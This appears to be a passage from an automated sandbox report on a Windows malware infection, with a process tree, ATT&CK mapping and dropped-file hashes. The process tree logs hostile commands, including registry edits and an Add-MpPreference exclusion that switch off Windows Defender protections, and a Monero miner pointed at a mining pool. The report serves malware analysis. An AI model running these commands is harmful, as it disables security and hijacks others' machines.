                                                                                                                                          1⤵
                                                                                                                                            PID:1136
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 996 -ip 996
                                                                                                                                            1⤵
                                                                                                                                              PID:952
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3516 --field-trial-handle=2252,i,16022092570067181109,3235558581947505669,262144 --variations-seed-version /prefetch:3
                                                                                                                                              1⤵
                                                                                                                                                PID:5148
                                                                                                                                              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                                "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                                                1⤵
                                                                                                                                                  PID:5420
                                                                                                                                                  • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                                                                                                                                    "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2076
                                                                                                                                                      • C:\Windows\Temp\542914.exe
                                                                                                                                                        "C:\Windows\Temp\542914.exe" --list-devices
                                                                                                                                                        3⤵
                                                                                                                                                          PID:3136
                                                                                                                                                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                                      "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                                                      1⤵
                                                                                                                                                        PID:1444
                                                                                                                                                        • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                                                                                                                                          "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                                                                                                                                          2⤵
                                                                                                                                                            PID:6056
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
                                                                                                                                                          1⤵
                                                                                                                                                            PID:5604
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:5748
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe
                                                                                                                                                              1⤵
                                                                                                                                                                PID:5796
                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:5288
                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:5300
                                                                                                                                                                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                                                    "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:5688
                                                                                                                                                                      • C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
                                                                                                                                                                        "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:6008
                                                                                                                                                                          • C:\Windows\Temp\54014.exe
                                                                                                                                                                            "C:\Windows\Temp\54014.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:5152
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS7A18.tmp\Install.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7zS7A18.tmp\Install.exe it /xLHdidspry 385118 /S
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:6520
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:6644
                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:6756
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:6792
                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:6912
                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:7028
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:7112
                                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:5332
                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:2884
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:6404
                                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:6280
                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:4680
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:1904
                                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                              PID:3180
                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:6180
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:4856
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                  PID:3004
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:7088
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:5276
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:6664
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:4952
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:6756
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:3032
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:1940
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:2832
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:5104
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:1864
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:6892
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:6016
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:7144
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:7056
                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\E16D.bat" "
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:6872
                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                          reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:7152
                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F4D7.bat" "
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:6184
                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                              reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:6352
                                                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:6208
                                                                                                                                                                                                                                              • C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                                                                                                                                                                C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:6232
                                                                                                                                                                                                                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                    PID:5584

                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                                                                                                Execution

                                                                                                                                                                                                                                                Command and Scripting Interpreter

                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                T1059

                                                                                                                                                                                                                                                PowerShell

                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                T1059.001

                                                                                                                                                                                                                                                System Services

                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                T1569

                                                                                                                                                                                                                                                Service Execution

                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                T1569.002

                                                                                                                                                                                                                                                Scheduled Task/Job

                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                Persistence

                                                                                                                                                                                                                                                Create or Modify System Process

                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                T1543

                                                                                                                                                                                                                                                Windows Service

                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                T1543.003

                                                                                                                                                                                                                                                Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                T1547

                                                                                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                T1547.001

                                                                                                                                                                                                                                                Scheduled Task/Job

                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                Privilege Escalation

                                                                                                                                                                                                                                                Create or Modify System Process

                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                T1543

                                                                                                                                                                                                                                                Windows Service

                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                T1543.003

                                                                                                                                                                                                                                                Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                T1547

                                                                                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                T1547.001

                                                                                                                                                                                                                                                Scheduled Task/Job

                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                Defense Evasion

                                                                                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                T1497

                                                                                                                                                                                                                                                Impair Defenses

                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                T1562

                                                                                                                                                                                                                                                Modify Registry

                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                T1112

                                                                                                                                                                                                                                                Discovery

                                                                                                                                                                                                                                                Query Registry

                                                                                                                                                                                                                                                4
                                                                                                                                                                                                                                                T1012

                                                                                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                T1497

                                                                                                                                                                                                                                                System Information Discovery

                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                T1082

                                                                                                                                                                                                                                                Process Discovery

                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                T1057

                                                                                                                                                                                                                                                Command and Control

                                                                                                                                                                                                                                                Web Service

                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                T1102

                                                                                                                                                                                                                                                Impact

                                                                                                                                                                                                                                                Service Stop

                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                T1489

                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                • C:\ProgramData\mozglue.dll
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  593KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                                                                                                                                • C:\Users\Admin\1000004002\884043a532.exe
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.8MB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  c04b70614b99ae6757d77ed17451f74b

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  0798739fb4e9ccd3dbde47083ad8d46e91ac846a

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  4488aa267ff56b5bac4bd005ffb3fe63b7cc6aed23c66a9c55b56d147c66e03d

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  4a4ba32056c4aa42417d27828a8ecc6617a800d90cd274d449915893877455c74aa806fc9bea1e74e5d691f2e7287251310840ae8992ac6431e1b00d173e1e68

                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  2B

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  d751713988987e9331980363e24189ce

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  40B

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  20d4b8fa017a12a108c87f540836e250

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  1ac617fac131262b6d3ce1f52f5907e31d5f6f00

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\[email protected]
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  656B

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  184a117024f3789681894c67b36ce990

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  c5b687db3b27ef04ad2b2cbc9f4e523cb7f6ba7e

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  b10d5fef165fc89e61cd16e02eac1b90b8f94ef95218bdd4b678cd0d5c8a925e

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  354d3bbc1329cbbe30d22f0cf95564e44acc68d6fe91e2beb4584a473d320faf4c092de9db7f1f93cf0b235703fc8de913883985c7d5db6b596244771a1edaf7

                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini
                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  830B

